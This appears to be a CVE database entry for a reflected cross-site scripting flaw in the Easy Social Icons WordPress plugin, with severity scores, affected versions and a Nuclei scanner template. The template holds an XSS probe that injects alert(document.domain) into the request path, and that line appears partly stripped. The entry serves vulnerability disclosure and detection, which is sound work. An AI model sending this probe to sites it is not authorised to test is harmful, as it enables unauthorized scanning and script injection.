CVE-2021-39322
published 2021-09-02CVE-2021-39322: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including…
PriorityP338medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
2.36%
81.6th percentile
The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected Cross-Site Scripting attack by injecting malicious code in the request path.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cybernetikz | easy_social_icons | < 3.0.9 | 3.0.9 |
| cybernetikz | easy_social_icons | 3.0.8 – 3.0.8 | — |
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
WordPress Easy Social Icons Plugin < 3.0.9 - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2021-39322 [MEDIUM] WordPress Easy Social Icons Plugin < 3.0.9 - Cross-Site Scripting
WordPress Easy Social Icons Plugin alert(document.domain)/?page=cnss_social_icon_page HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'alert(document.domain)'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a00473045022100dccc70f11c9b5b15ab5507ddd6a9decee04c0b492dedaf69b57e7fb8daf384a30220532b3caa34e9c13d75d2de425fac03ad43609d46c67cf40305496ca20ef78f40:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
2021-09-02
Published